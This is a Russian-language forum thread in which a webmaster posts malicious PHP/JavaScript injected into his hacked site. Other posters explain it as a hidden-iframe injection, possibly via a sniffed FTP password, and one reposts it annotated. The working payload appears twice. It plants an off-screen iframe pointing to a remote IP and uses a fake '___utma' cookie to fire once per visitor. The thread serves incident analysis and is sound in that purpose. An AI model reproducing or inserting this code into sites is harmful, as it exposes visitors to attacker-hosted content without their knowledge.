Добрый день! На днях ломанули сайт, внедрив в него вредоносный код. Проблему со взломом, вроде как, решил, но интересно что делает код, который мне вешали? П.С. Может кто сталкивался с этой проблемой и знает как именно ломались сайты - воровство пасов к ФТП, взлом хостера, проникновение через уязвимости сайтов или как-то еще? Code: <? #b44d55# echo " <script type=\"text/javascript\" language=\"javascript\" > function llolwut() { var momge = document.createElement('iframe'); momge.src = 'http://69.67.187.39/TpqzKHZm.php'; momge.style.border='0'; momge.style.position='absolute'; momge.style.left='-1234px'; momge.style.top='-1337px'; momge.style.height='21px'; momge.style.width='21px'; if (!document.getElementById('momge')) { document.write('<div name=\'momge\' id=\'momge\'></div>'); document.getElementById('momge').appendChild(momge); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today=new Date(); var expire=new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 1800000*24*nDays); document.cookie=cookieName+\"=\"+escape(cookieValue) + \";expires=\" + expire.toGMTString() + ((path) ? \"; path=\" + path : \"\");}function GetCookie(name) { var start = document.cookie.indexOf( name + \"=\" ); var len = start + name.length + 1; if ((!start) && (name != document.cookie.substring(0,name.length))) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( \";\", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled) { if(GetCookie('___utma')=='84f5e86989f374536450659c18f5489e'){}else{SetCookie('___utma', '84f5e86989f374536450659c18f5489e', '1', '/'); llolwut();}}</script>"; #/b44d55# ?>
Могу ошибаться, если так - поправьте, но на мой взгляд, это - сниффер, пущеный через XSS. На мысль натолкнул вот этот пост: https://forum.antichat.ru/showpost.php?p=314897&postcount=7
JS iframe Вам запилили вот на этот ресурс: "http://69.67.187.39/TpqzKHZm.php" А что ифрэйм с этого ресурса грузил посетителям вашего сайта ХЗ. Судя по гуглу этот ифрэйм Украину особо любит.
Спасибо, что натолкнули на мысль. Учитывая, что FTP был обычным. а не FTPS, вполне возможно, что висел снифер.
Как-то так: Code: <script type="text/javascript" language="javascript"> // весь следующий код внедряется в страницу function llolwut() // функция, создающая невидимый iframe - http://69.67.187.39/TpqzKHZm.php { var momge = document.createElement('iframe'); momge.src = 'http://69.67.187.39/TpqzKHZm.php'; momge.style.border= '0'; momge.style.position = 'absolute'; momge.style.left = '-1234px'; momge.style.top = '-1337px'; momge.style.height = '21px'; momge.style.width = '21px'; if ( !document.getElementById( 'momge' ) ) // если еще не сделали iframe { document.write('<div name=\'momge\' id=\'momge\'></div>'); document.getElementById('momge').appendChild(momge ); // сделать его } } function SetCookie( cookieName, cookieValue, nDays, path ) // установить кукисы { var today=new Date(); var expire=new Date(); if ( nDays==null || nDays==0 ) nDays=1; expire.setTime(today.getTime() + 1800000*24*nDays); document.cookie = cookieName + "=" + escape( cookieValue ) + ";expires=" + expire.toGMTString() + ( (path) ? ";path = " + path : ""); } function GetCookie(name) // получить кукисы { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( (!start) && ( name != document.cookie.substring( 0,name.length ) ) ) return null; if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } // основной код if ( navigator.cookieEnabled ) // если кукисы включены в настройках { if( GetCookie( '___utma' ) == '84f5e86989f374536450659c18f5489e' ) {} // если проставлены вредные кукисы - ничего не делать else // если не проставлены - установить их и внедрить невидимый iframe в код страницы { SetCookie( '___utma', '84f5e86989f374536450659c18f5489e', '1', '/' ); llolwut(); } } </script>
